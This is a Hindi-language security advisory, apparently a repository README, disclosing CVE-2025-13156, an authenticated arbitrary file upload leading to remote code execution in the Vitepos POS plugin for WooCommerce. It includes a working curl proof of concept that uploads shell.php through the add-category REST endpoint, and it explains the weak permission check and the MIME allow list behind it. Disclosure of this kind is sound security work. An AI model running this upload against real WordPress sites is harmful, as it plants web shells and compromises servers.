
CVE-2025-13156 के लिए प्रकटीकरण
CVE-2025-13156 के लिए प्रकटीकरण
यह रिपॉज़िटरी Vitepos – Point of Sale (POS) for WooCommerce <= 3.3.0, appsbd द्वारा विकसित WordPress प्लगइन में खोजी गई एक भेद्यता का खुलासा करती है।
| CVE ID | प्रकार | घटक | प्रभाव |
|---|
| CVE-2025-13156 | प्रमाणित (Subscriber+) मनमानी फ़ाइल अपलोड से रिमोट कोड निष्पादन | modules/class-pos-settings.php api/v1/class-pos-product-api.php | प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें अपलोड करना |
curl -k \
'http://localhost:8080/wp-json/vitepos/v1/product/add-category' \
-H 'Cookie: wordpress_logged_in_<your_hash>=<your_cookie>' \
-H 'X-WP-Nonce: <your_nonce>' \
-F 'category_name=evil' \
-F 'category_parent=0' \
-F 'category_description=PoC-shell' \
-F 'category_image=@./shell.php;filename="shell.php";type=application/octet-stream'
प्लगइन के /wp-json/vitepos/v1/product/... के अंतर्गत REST रूट्स एक उदार अनुमति जाँच पर निर्भर करते हैं जो प्रभावी रूप से किसी भी लॉग-इन उपयोगकर्ता (is_user_logged_in()) को स्वीकार कर लेती है, यह अनदेखा करते हुए कि कॉल करने वाला POS उपयोगकर्ता है या उसके पास उत्पाद शर्तों (product terms) को प्रबंधित करने की क्षमता है। परिणामस्वरूप, निम्न-विशेषाधिकार वाली भूमिकाएँ (जैसे, Subscriber) add-category/update-category जैसे एंडपॉइंट्स तक पहुँच सकती हैं।
चूँकि इसे WebRoot के ठीक नीचे नहीं रखा जा सकता, इसलिए पर्यावरण के आधार पर यह सफल नहीं हो सकता। Uploads के अंतर्गत मूल रूप से PHP निष्पादन की अनुमति नहीं है, इसलिए मुझे लगा कि बहुत ही असामान्य वातावरण के बिना यह संभव नहीं होगा। जिस क्षण मैंने MIME अनुमत सूची में application/octet-stream स्ट्रिंग देखी, मुझे बुरा आभास हुआ, लेकिन यह वास्तव में सफल हो गया, जो आश्चर्यजनक था। मूल रूप से, WordPress का कोर PHP अपलोड को रोकता है, लेकिन चूँकि इस प्लगइन ने अपनी स्वयं की प्रक्रिया लागू की थी, इसलिए यह भेद्यता पुनः उत्पन्न की जा सकी। यह काफ़ी दुर्लभ मामला है।
नाम: MooseLove
भूमिका: स्वतंत्र सुरक्षा शोधकर्ता / बग हंटर
संपर्क: अनुरोध पर उपलब्ध
यह एडवाइज़री सार्वजनिक सुरक्षा जागरूकता के लिए प्रदान की गई है। श्रेय के साथ साझा करने के लिए स्वतंत्र है।